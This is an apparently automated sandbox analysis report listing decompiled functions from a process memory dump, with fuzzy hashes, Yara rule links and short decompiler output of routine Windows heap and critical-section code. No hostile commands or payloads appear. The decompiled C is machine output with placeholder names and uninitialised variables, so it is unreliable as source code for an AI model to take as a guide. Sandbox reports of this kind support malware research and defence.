Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction Fuzzy Hash: 25D0E935352A80DFD71ACF1DC558B1573A8BB45B45FC509A0E541CBB61E62CE994CA00

Uniqueness

Uniqueness Score: -1.00%

Function 0495A537, Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0495A537(intOrPtr _a4, intOrPtr _a8) {

				return L048F8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}

0x0495a553

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction ID: e730683a8dabb90d8b35155748fc827f197978ed6e10472e2e5f9f364908c640
Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction Fuzzy Hash: 90C01232080648BBCB126E85CC00F067B2AEB94B60F008410BA080A5608672E970EA84

Uniqueness

Uniqueness Score: -1.00%

Function 048DDB40, Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E048DDB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L048F4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}

0x048ddb4d
0x048ddb54
0x048ddb5f
0x048ddb56
0x048ddb56
0x048ddb5c
0x048ddb5c

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction ID: 05a1bbb470f306e0174627ad05d9872a6e3accca45da916b6d537bef7d2856ec
Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction Fuzzy Hash: DEC08C30281A40AAFB221F20CD01B0137A0BB10F09F4409A06300DA0F0DBBCE901EA10

Uniqueness

Uniqueness Score: -1.00%

Function 048DAD30, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E048DAD30(intOrPtr _a4) {

				return L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x048dad49

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction ID: 62311008293c2b8abab7f2a504008fa48996785fff9134ad505084140047b4d7
Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction Fuzzy Hash: 7BC08C32080648BBD7126A49CD00F017B29E790B60F000020B6044A661CA72F860D588

Uniqueness

Uniqueness Score: -1.00%

Function 049036CC, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E049036CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L048F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}

0x049036d2
0x049036e8
0x049036d4
0x049036e5
0x049036e5

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction ID: 7b3493df63e40330fe973d20bdbd526913d0d736911fa1737f3658b81c5d670f
Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction Fuzzy Hash: F1C08C70150440EAEA251B20CD01B157258A710A21F6407647220894E0D568AC00D500

Uniqueness

Uniqueness Score: -1.00%

Function 048E76E2, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E048E76E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}

0x048e76e4
0x00000000
0x048e76f8
0x048e76fd

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction ID: e08325f167dc1a9eabf7b51093a9169b9ea307893859f2534c65c677bf760737
Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction Fuzzy Hash: 17C08C701555849AFB2E6F09CE20B303650AB0970CF480B9CAA01894B1C3A8B802C208

Uniqueness

Uniqueness Score: -1.00%

Function 048F3A1C, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E048F3A1C(intOrPtr _a4) {
				void* _t5;

				return L048F4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x048f3a35

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction ID: 8cf5b27ae0c53e4312dc0aa6ad21f0345f4fb9d18a45c3faeb4280ea764bde9c
Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction Fuzzy Hash: 58C08C32080248BBDB126E45DC00F027B29E7A0B60F000021B7040A5608576ED60D998

Uniqueness

Uniqueness Score: -1.00%

Function 048F7D50, Relevance: .0, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E048F7D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}

0x048f7d56
0x048f7d5b
0x048f7d60
0x048f7d5d
0x048f7d5d
0x048f7d5d

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: 0e84cf2681faaef74eb1147ffc1a4e2de1199bc37dc96b0b83c300e6ac3db61a
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction Fuzzy Hash: E1B092343029808FDF16EF18C580B1533E4BB44A40B8404D0E400CBA20D229E8008900

Uniqueness

Uniqueness Score: -1.00%

Function 04902ACB, Relevance: .0, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04902ACB() {
				void* _t5;

				return E048EEB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}

0x04902adc

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction ID: a7935bcaafbccdcf178fac809b88ef5a0b8bfc30c018e4895659dc199dead9ff
Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction Fuzzy Hash: 91B01232C10440CFCF02EF44C650B397331FB40750F054990940177930C228BC01CB40

Uniqueness

Uniqueness Score: -1.00%

Function 049195F0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f81a19606edcaf76d9bae16a0897f0ed56122adc7e3ea47637f26139f837775a
Instruction ID: 92285c507705dc531f36a540d16629ca37e7e0337d696cdb14a18d1d2f55b525
Opcode Fuzzy Hash: f81a19606edcaf76d9bae16a0897f0ed56122adc7e3ea47637f26139f837775a
Instruction Fuzzy Hash: DA90027120111802F104A1595904686004597D0355F61C121AA015655E96A5D8917171

Uniqueness

Uniqueness Score: -1.00%

Function 0491AD30, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b0856e879d04465cbc46179e7bb9aa09d02a9587d9a638ef80362d4e2e67685
Instruction ID: 8b3177cde0ba87436dd61db98775da13a9dc2e48223bdb95315742df6eb895f8
Opcode Fuzzy Hash: 9b0856e879d04465cbc46179e7bb9aa09d02a9587d9a638ef80362d4e2e67685
Instruction Fuzzy Hash: C6900271A0511012B140B15959146464046A7E0795B65C121A4505554C8994DA5563E1

Uniqueness

Uniqueness Score: -1.00%

Function 04919520, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 322236dda1cb6b688ad36e7d09efd9f161c640c04292ede88b1c34d79ff81d50
Instruction ID: 3f75ede8767a0d7b02bc1ceeacd90e58674bbab088851d9ee64bef6cdb049f7d
Opcode Fuzzy Hash: 322236dda1cb6b688ad36e7d09efd9f161c640c04292ede88b1c34d79ff81d50
Instruction Fuzzy Hash: 2B9002E1201250926500E2599504B0A454597E0255B61C126E5045560CC565D851A175

Uniqueness

Uniqueness Score: -1.00%

Function 049197A0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48ab326675763841e506ec7ea4a41ece128497e173e7c95b2cef8f9c94158b78
Instruction ID: d3c69a18fd347e92b4b568cd6d0dd5020d0d947f256f5dce39dfff8d4383b505
Opcode Fuzzy Hash: 48ab326675763841e506ec7ea4a41ece128497e173e7c95b2cef8f9c94158b78
Instruction Fuzzy Hash: 7690026130111003F140B15965186064045E7E1355F61D121E4405554CD955D8566262

Uniqueness

Uniqueness Score: -1.00%

Function 0491A710, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b1aa9a41469201b38eb2dea5511f6f8a3ac0605de1f58126be0eb48dd3f7277
Instruction ID: f2a27a946186857fd9ab2134e58dc14519b160b086b6dfa0ddac3bfb872b1564
Opcode Fuzzy Hash: 1b1aa9a41469201b38eb2dea5511f6f8a3ac0605de1f58126be0eb48dd3f7277
Instruction Fuzzy Hash: F690027130111052B500E6996904A4A414597F0355B61D125A8005554C8594D8616161

Uniqueness

Uniqueness Score: -1.00%

Function 04919730, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b64dd8c0d2ab184ff88f83fdc87d61c9aeb90c29162628dca68b8acf71e72d5
Instruction ID: 3f6933856b46eca80091235acde23f9da9019c1aee88de081f625a24b26a8ab3
Opcode Fuzzy Hash: 0b64dd8c0d2ab184ff88f83fdc87d61c9aeb90c29162628dca68b8acf71e72d5
Instruction Fuzzy Hash: D390026160511402F140B1596518706005597D0255F61D121A4015554DC699DA5576E1

Uniqueness

Uniqueness Score: -1.00%

Function 0491A770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f50ecde6f82500a3fbe72b0e1479bff1e912f596fe5c2ee4657afad97bf5475
Instruction ID: b64e01db7021cf3676da652d239bf6063616a0d8bc68b327d04b88af593cf70d
Opcode Fuzzy Hash: 0f50ecde6f82500a3fbe72b0e1479bff1e912f596fe5c2ee4657afad97bf5475
Instruction Fuzzy Hash: 8A90027520515442F500A5596904A87004597D0359F61D521A441559CD8694D861B161

Uniqueness

Uniqueness Score: -1.00%

Function 04919760, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c952cd022ba08a1fd425f7b75511584a55752a8dbf89ff2d81a5411ac57b85d
Instruction ID: 960d2fd3236f7f6faa3ef49161326ce59f6df2ecc18a242c1bd22ed6bdcc7b1c
Opcode Fuzzy Hash: 9c952cd022ba08a1fd425f7b75511584a55752a8dbf89ff2d81a5411ac57b85d
Instruction Fuzzy Hash: DD90027120111403F100A1596608707004597D0255F61D521A4415558DD696D8517161

Uniqueness

Uniqueness Score: -1.00%

Function 049198A0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53c407329d87e8b805b0e7ddbe6b3b77d988e13025c45f4c1a6b04707ca2be06
Instruction ID: 5fa0ed64096c84c09ccd90f3be923ef8cbcc61b9d0811c75de699274678be06b
Opcode Fuzzy Hash: 53c407329d87e8b805b0e7ddbe6b3b77d988e13025c45f4c1a6b04707ca2be06
Instruction Fuzzy Hash: C590026130111402F102A15955146060049D7D1399FA1C122E5415555D8665D953B172

Uniqueness

Uniqueness Score: -1.00%

Function 049198F0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fe24590aab0e8544d3fba168909396ccbefebe66cedf7e518214564c0d4f8b6
Instruction ID: ea2f7176aa99e82463aea608718e106d0e160ab561e00a20f7e0a2dddbf19bee
Opcode Fuzzy Hash: 4fe24590aab0e8544d3fba168909396ccbefebe66cedf7e518214564c0d4f8b6
Instruction Fuzzy Hash: 1690026160111502F101B1595504616004A97D0295FA1C132A5015555ECA65D992B171

Uniqueness

Uniqueness Score: -1.00%

Function 04919820, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8e1e358328c2d286796bcf2a66e0ab0b49d4ffa39c61b10623eb79894cae2b3
Instruction ID: 87b8a2a21420f18239a7ee43f15c95bf8848c99ae3746c2fdb4fa93b7d2ce0d8
Opcode Fuzzy Hash: c8e1e358328c2d286796bcf2a66e0ab0b49d4ffa39c61b10623eb79894cae2b3
Instruction Fuzzy Hash: DF90027124111402F141B15955046060049A7D0295FA1C122A4415554E8695DA56BAA1

Uniqueness

Uniqueness Score: -1.00%

Function 0491B040, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc00bccad4b77a6e0cf0e16b8ec6375c1650ac874d39bb7f8b7b136e435ef8dd
Instruction ID: 4024311ef4e2e9f16ba7fae3626bb53cd36f60c511e973861713fe7b6f195ffe
Opcode Fuzzy Hash: dc00bccad4b77a6e0cf0e16b8ec6375c1650ac874d39bb7f8b7b136e435ef8dd
Instruction Fuzzy Hash: 469002A1601250436540F15959044065055A7E13553A1C231A4445560C86A8D855A2A5

Uniqueness

Uniqueness Score: -1.00%

Function 049199D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: feedf13c0f5e779f2ea3f1e1d9e940696b34185f0fe2a1d87553ac79d68fa9e5
Instruction ID: e2b25b8328f5fbfe30c84464f4c76624c4c221364c7d0308b861495dfd0f79e3
Opcode Fuzzy Hash: feedf13c0f5e779f2ea3f1e1d9e940696b34185f0fe2a1d87553ac79d68fa9e5
Instruction Fuzzy Hash: 789002A121111042F104A1595504706008597E1255F61C122A6145554CC569DC616165

Uniqueness

Uniqueness Score: -1.00%

Function 04919950, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e69136a4dc1ee11868d1817379faf93682cba0e6d2f27616c7ecf6a6c87efe9b
Instruction ID: b2ca0ce7e6b308438989e714be92db5983d765af5935cd7ae7f3a712fb4c5e9e
Opcode Fuzzy Hash: e69136a4dc1ee11868d1817379faf93682cba0e6d2f27616c7ecf6a6c87efe9b
Instruction Fuzzy Hash: 439002A120151403F140A5595904607004597D0356F61C121A6055555E8A69DC517175

Uniqueness

Uniqueness Score: -1.00%

Function 04919A80, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9841a4c211eac8abb26a54744e95d31d2cddca1d1b8bf1d69805e782ce58d13
Instruction ID: 036caaaab94234b3dee6fbc172f85d91b1dde9f75672aa503643cf9f110050d1
Opcode Fuzzy Hash: f9841a4c211eac8abb26a54744e95d31d2cddca1d1b8bf1d69805e782ce58d13
Instruction Fuzzy Hash: E690026120155442F140A2595904B0F414597E1256FA1C129A8147554CC955D8556761

Uniqueness

Uniqueness Score: -1.00%

Function 04919A10, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63efb2ea0d302ed3dc4f92e019f9cf6d6b04837a0636c2dd99d58ed2b8d1ff4c
Instruction ID: d60fb53d53c3a948e0c72d1bbca05c5d804bdf259cc234af17fc488adf4bf380
Opcode Fuzzy Hash: 63efb2ea0d302ed3dc4f92e019f9cf6d6b04837a0636c2dd99d58ed2b8d1ff4c
Instruction Fuzzy Hash: E490027120151402F100A1595908747004597D0356F61C121A9155555E86A5D8917571

Uniqueness

Uniqueness Score: -1.00%

Function 04919A00, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4f503284344cf3ac8960f87206338386fe0d2783a99595679716ee95b984b83
Instruction ID: 278cf623632f35b80f16e0ea97a4a25532340900ad0c8017f5b523c9c274b0a9
Opcode Fuzzy Hash: b4f503284344cf3ac8960f87206338386fe0d2783a99595679716ee95b984b83
Instruction Fuzzy Hash: 6690027120151402F100A159591470B004597D0356F61C121A5155555D8665D85175B1

Uniqueness

Uniqueness Score: -1.00%

Function 04919A20, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1344e1fb912f8447bab722c34ec849553093458919e056de9bfb29ac58d26484
Instruction ID: f597edb108a3e54e1f4f80e994b536b48d5125fca10c639f6d07f2e16d7e8611
Opcode Fuzzy Hash: 1344e1fb912f8447bab722c34ec849553093458919e056de9bfb29ac58d26484
Instruction Fuzzy Hash: AD900261601110426140B16999449064045BBE1265761C231A4989550D8599D86566A5

Uniqueness

Uniqueness Score: -1.00%

Function 0491A3B0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cda36f8848420a8969dca74ad595b8521d4c5278a41e8109bb358c60aa61f28
Instruction ID: 73aa3fbf44724da93a89544f7b7283f4fb7a3e14bb80d474c70536a29b43169c
Opcode Fuzzy Hash: 4cda36f8848420a8969dca74ad595b8521d4c5278a41e8109bb358c60aa61f28
Instruction Fuzzy Hash: F690027120155002F140B159954460B5045A7E0355F61C521E4416554C8655D856A261

Uniqueness

Uniqueness Score: -1.00%

Function 04919B00, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c8784e14491d8fdc4aec2637360cf17dd32538cb56f06af6a5750c384ad71b8
Instruction ID: 890a3bb972388f34729b4f86c08302c0663dc35c7e6a493905297e96d8706be8
Opcode Fuzzy Hash: 3c8784e14491d8fdc4aec2637360cf17dd32538cb56f06af6a5750c384ad71b8
Instruction Fuzzy Hash: 9D90026124111802F140B15995147070046D7D0655F61C121A4015554D8656D96576F1

Uniqueness

Uniqueness Score: -1.00%

Function 04919670, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 1b3a94c34b0d39e2cca879be26508ac1137eff26d6c226b0e1e28af9bae164be
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0496FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0496FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0491CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04965720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04965720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x0496fdda
0x0496fde2
0x0496fde5
0x0496fdec
0x0496fdfa
0x0496fdff
0x0496fe0a
0x0496fe0f
0x0496fe17
0x0496fe1e
0x0496fe19
0x0496fe19
0x0496fe19
0x0496fe20
0x0496fe21
0x0496fe22
0x0496fe25
0x0496fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0496FDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0496FE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0496FE2B

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
